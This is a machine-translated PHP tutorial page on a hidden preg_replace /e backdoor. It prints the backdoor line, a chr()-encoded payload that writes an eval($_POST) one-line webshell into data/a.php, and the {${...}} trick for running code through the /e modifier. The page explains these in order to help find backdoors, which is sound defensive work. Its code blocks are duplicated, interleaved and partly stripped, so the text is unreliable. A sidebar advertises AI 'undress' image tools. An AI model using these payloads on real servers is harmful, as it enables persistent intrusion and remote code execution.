Home Backend Development PHP Tutorial preg_replace hidden backdoor and subsequent exploration_PHP tutorial

preg_replace hidden backdoor and subsequent exploration_PHP tutorial

Jul 13, 2016 pm 05:10 PM
php replace steamed stuffed bun and Explore have Play hide

There are many PHP backdoors, and I have seen and played with Baozi a lot, but when I helped a friend check the server, I found such malicious code.

The thing is like this, using various backdoor search tools on my friend’s website, no PHP Trojan was found. I can’t always find it. Xiao Hei’s tricks are very advanced. Every time I use them

After using it, I always delete the backdoor, but I can still come in every time, but I can’t find where it came in. This is really painful.

Later, I finally found some clues in the logs. Through my analysis, I found that an IP always posted strange data to a certain file. Then a paragraph

After a while, this IP accessed an inexplicable file with a very conspicuous name. It was obviously not a normal system file, but a PHP backdoor. But soon after using the backdoor

was deleted.

Haha, Xiao Hei is very attentive when I meet him.

Then through analysis, it was found that the file discovery code accessed by Xiaohei:

The code is as follows Copy code
 代码如下 复制代码

@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

It’s okay if you see this code, but this is the malicious code and backdoor hidden by Xiaohei. Go covert, basically anything

No anti-virus software can detect it.

preg_replace function prototype:

mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])

Special instructions:

The

/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreferences have been replaced). Tip: Make sure

replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace()

Wrong.

The above code is for POST to accept data and needs to be tested, which is more troublesome. If it is replaced by GET to obtain data. . .

Example:
 代码如下 复制代码

echo preg_replace("/test/e",$_GET["h"],"jutst test");

The code is as follows Copy code

echo preg_replace("/test/e",$_GET["h"],"jutst test");

If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP

Code execution).

 代码如下 复制代码


 ?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr

(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr

(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr

(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr

(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))

If we want to POST, what will happen if we test and submit the following code?

The code is as follows Copy code

?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112). chr(101).chr
 代码如下 复制代码

fputs(fopen(data/a.php,w),);

(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46 ).chr(112).chr(104).chr (112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60 ).chr(63).chr(112).chr (104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95 ).chr(80).chr(79).chr (83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62 ).chr(39).chr(41).chr(59))
The plaintext corresponding to the ciphertext is:
The code is as follows Copy code
fputs(fopen(data/a.php,w),);

The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.

This is terrifying. . . .

Another difficult example:

View code printing?

Note: Functions enclosed in double quotes will not be executed and replaced.
The code is as follows
 代码如下 复制代码

function test($str)

{

}

echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]);

?>

Copy code

function test($str)

{

}

echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]);

?>

Submit ?h=[php]phpinfo()[/php], will phpinfo() be executed?

Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time

Counted.

Is there any way to make it execute?

Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
 代码如下 复制代码

1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed.

Here we need to construct a special variable, 'test("{${phpinfo()}}")' through {${}}, to achieve the effect of allowing the function to be executed

(${phpinfo()} will be interpreted and executed).

echo "{${phpinfo()}}"; phpinfo will be executed successfully. So, please pay attention when looking for backdoors. OK, having said so much and understanding it, the code I gave above:
The code is as follows Copy code
1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");
What looks like a normal code is actually an extremely dangerous code, which is quite hidden http://www.bkjia.com/PHPjc/629643.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/629643.htmlTechArticleThere are many PHP backdoors, and Baozi has seen and played with them a lot, but when I helped a friend check the server , unexpectedly found such malicious code. Here’s the thing, my friend’s website...
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Best Graphic Settings
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. How to Fix Audio if You Can't Hear Anyone
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25: How To Unlock Everything In MyRise
4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian Dec 24, 2024 pm 04:42 PM

PHP 8.4 brings several new features, security improvements, and performance improvements with healthy amounts of feature deprecations and removals. This guide explains how to install PHP 8.4 or upgrade to PHP 8.4 on Ubuntu, Debian, or their derivati

CakePHP Date and Time CakePHP Date and Time Sep 10, 2024 pm 05:27 PM

To work with date and time in cakephp4, we are going to make use of the available FrozenTime class.

Discuss CakePHP Discuss CakePHP Sep 10, 2024 pm 05:28 PM

CakePHP is an open-source framework for PHP. It is intended to make developing, deploying and maintaining applications much easier. CakePHP is based on a MVC-like architecture that is both powerful and easy to grasp. Models, Views, and Controllers gu

CakePHP File upload CakePHP File upload Sep 10, 2024 pm 05:27 PM

To work on file upload we are going to use the form helper. Here, is an example for file upload.

CakePHP Creating Validators CakePHP Creating Validators Sep 10, 2024 pm 05:26 PM

Validator can be created by adding the following two lines in the controller.

How To Set Up Visual Studio Code (VS Code) for PHP Development How To Set Up Visual Studio Code (VS Code) for PHP Development Dec 20, 2024 am 11:31 AM

Visual Studio Code, also known as VS Code, is a free source code editor — or integrated development environment (IDE) — available for all major operating systems. With a large collection of extensions for many programming languages, VS Code can be c

CakePHP Quick Guide CakePHP Quick Guide Sep 10, 2024 pm 05:27 PM

CakePHP is an open source MVC framework. It makes developing, deploying and maintaining applications much easier. CakePHP has a number of libraries to reduce the overload of most common tasks.

How do you parse and process HTML/XML in PHP? How do you parse and process HTML/XML in PHP? Feb 07, 2025 am 11:57 AM

This tutorial demonstrates how to efficiently process XML documents using PHP. XML (eXtensible Markup Language) is a versatile text-based markup language designed for both human readability and machine parsing. It's commonly used for data storage an

See all articles